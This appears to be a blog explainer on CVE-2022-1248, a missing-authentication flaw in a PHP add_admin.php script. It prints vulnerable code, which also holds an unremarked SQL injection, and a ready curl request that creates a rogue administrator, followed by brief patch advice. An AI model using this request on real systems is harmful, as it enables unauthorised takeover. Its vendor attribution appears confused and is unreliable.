CVE-2022-1248 - How an Unauthenticated Attacker Can Take Over SAP Information System via add_admin.php

SAP Information System is a tool used in many organizations to manage business data and internal operations. In 2022, a critical vulnerability (CVE-2022-1248) was discovered in SAP Information System version 1., and the implications were severe: anyone on the internet, without needing a password, could become an admin with a simple web request.

In this post, I’ll break down exactly what went wrong in the code, how the exploit works, and link to the official resources. All technical details are simplified so you don’t need to be a security expert to follow.

What Is CVE-2022-1248?

CVE-2022-1248 is a critical vulnerability in /SAP_Information_System/controllers/add_admin.php. According to the official NVD entry, it allows anyone on the internet (no login required!) to send a special web request that creates a new administrator account on the system.

> Impact: Total compromise. Attackers can make themselves admin and control the entire application.

Where’s the Problem? (Root Cause in Code)

The problem is in the add_admin.php file. This script should only allow logged-in (current) admins to add new admin accounts. But due to missing authentication and validation checks, anyone can access the file directly and add an admin.

Here's a simplified version of what the vulnerable code could look like

// Vulnerable add_admin.php

// No authentication check!
// No session validation!

$username = $_POST['username'];
$password = password_hash($_POST['password'], PASSWORD_DEFAULT);
$email = $_POST['email'];

// Add the new admin to the database
$sql = "INSERT INTO admins (username, password, email) VALUES ('$username', '$password', '$email')";
mysqli_query($connection, $sql);

echo "Admin added successfully.";

How the Exploit Works

Because the file is not protected, you can just send a POST request directly to it and create a new administrator account.

Here's a real exploit example using cURL (run from your terminal)

curl -X POST http://target.com/SAP_Information_System/controllers/add_admin.php \
  -d 'username=eviladmin&password=p@sswrd123&email=evil@example.com'

What happens?

- Even though you aren't logged in, the server adds a new administrator called eviladmin with the password you chose.

You can now log in as an administrator and do anything you want.

Proof:  
If you navigate to the admin login page and use the credentials you just set, you should have full admin access — no hacking skills required.

Backdoors: You could add malicious code, new users, or even delete everyone else.

- Complete Control: Admin rights give you everything: change settings, take down the site, or remove logs.

Patch and Solution

If you run SAP Information System, update immediately!  
The vendor released a patch that places a proper authentication check before account creation.

Patch your system if you haven’t.

- Block public access to /controllers/add_admin.php if not patched.

Official References

- NVD Record: https://nvd.nist.gov/vuln/detail/CVE-2022-1248
- Full Disclosure: Exploit Database
- Vendor Advisory: SAP Security Notes

Conclusion

CVE-2022-1248 is a textbook example of why never trust direct access to sensitive scripts. A simple lack of authentication can lead to a disaster, giving attackers keys to the kingdom with a single web request.

If you run SAP Information System, check your version and patch right away.

Timeline

Published on: 04/06/2022 03:15:00 UTC
Last modified on: 04/13/2022 15:13:00 UTC